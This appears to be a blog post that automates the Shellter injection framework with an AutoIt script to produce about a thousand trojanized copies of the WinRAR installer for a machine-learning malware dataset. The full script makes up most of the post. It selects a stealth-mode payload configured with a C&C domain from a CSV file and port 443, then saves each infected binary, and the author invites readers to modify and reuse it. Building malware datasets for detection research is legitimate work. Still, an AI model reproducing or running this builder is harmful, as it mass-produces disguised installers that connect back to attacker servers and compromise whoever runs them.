Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.
Purpose: Creation of malware dataset for Machine Learning
Background: SHELLTER is an closed-source shellcode injection framework that performs dynamic PE infection based upon execution flow of the target application. This approach does not modify the original PE header thus allowing it to appear normal using static analysis.
SHELLTER is a windows PE binary and can be found https://www.shellterproject.com/download/
It can be executed on Linux using WINE or directly in Windows.
Challenge: I initially ran SHELLTER from Linux but have difficulty automating a WINE terminal. After researching on using PYTHON subprocess, i found it too much of a hassle to attempt redirection to and fro a WINE terminal from a Linux terminal.
Thus i ended up automating SHELLTER from native Windows instead. Autoit is a free software designed for creation of automated scripts.
Overview of Technique:
1) Create a Win7 VM on VMWARE
2) Download SHELLTER
3) Download and install Autoit
4) Open Autoit SciTE script editor
5) Typed in the following script
#include <MsgBoxConstants.au3>;
#RequireAdmin
#include <FileConstants.au3>;
#include <MsgBoxConstants.au3>;
#include <WinAPIFiles.au3>;
#include <File.au3>;
;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")
Func Generate($vVar1 = "google.com")
Run('.\shellter.exe')
Sleep(1000)
WinWaitActive("Shell7er", "", 1)
;automate
Send("A{Enter}")
Sleep(1000)
;Do not check update
Send("N{Enter}")
Sleep(1000)
;original binary path
Send(".\wrar560.exe{Enter}")
Sleep(35000)
;Stealth mode
Send("Y{Enter}")
Sleep(1000)
;payload selection
Send("l{Enter}")
Sleep(2000)
Send("3{Enter}")
Sleep(1000)
;domain name
Send($vVar1)
Send("{Enter}")
Sleep(1000)
;port number
Send("443{Enter}")
Sleep(10000)
Send("{Enter}")
EndFunc
Func print($test3)
MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc
$file = ".\website.csv"
FileOpen($file, 0)
;2 is first entry, 1 is the header
$StartFrom = 2
For $i = $StartFrom to _FileCountLines($file)
$line = StringSplit(FileReadLine($file, $i),",")
$domainName = $line[1]
Generate($domainName)
;print($line[2])
Sleep(3000)
$sDestination = ".\malware\" & $line[2]
;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
FileMove(".\wrar560.exe", $sDestination, $FC_OVERWRITE)
FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next
FileClose($file)
6) Save the Autoit script in the same directory where Shellter.exe resides in.
7) Create a csv file using excel with the following format and save it as website.csv:
8) I have chosen to pack winrar (wrar560.exe) with the payload, you may find it here https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the Autoit script
Results:
Took about 2 days to create over 900 malware samples. 100 more to go =)
Feel free to modify the script accordingly.
Posts
No comments:
Post a Comment